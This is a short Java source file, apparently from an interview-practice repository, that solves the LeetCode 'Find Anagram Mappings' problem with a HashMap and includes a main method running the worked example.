//These lists A and B may contain duplicates. If there are multiple answers, output any of them.
//For example, given
//A = [12, 28, 46, 32, 50]
//B = [50, 12, 32, 46, 28]
//We should return
//[1, 4, 3, 2, 0]
//as P[0] = 1 because the 0th element of A appears at B[1], and P[1] = 4 because the 1st element of A appears at B[4], and so on.
import java.util.HashMap;
class FindAnagramMappings {
public int[] anagramMappings(int[] A, int[] B) {
int[] mapping = new int[A.length];
HashMap<Integer, Integer> map = new HashMap<Integer, Integer>();
for(int i = 0; i < B.length; i++) {
map.put(B[i], i);
}
for(int i = 0; i < A.length; i++) {
mapping[i] = map.get(A[i]);
}
return mapping;
}
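    // A minimal usage sketch (not part of the original solution): runs the example
    // from the problem statement above; expected output is [1, 4, 3, 2, 0].
    public static void main(String[] args) {
        int[] A = {12, 28, 46, 32, 50};
        int[] B = {50, 12, 32, 46, 28};
        System.out.println(java.util.Arrays.toString(new FindAnagramMappings().anagramMappings(A, B)));
    }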
}
| kdn251/interviews | leetcode/hash-table/FindAnagramMappings.java |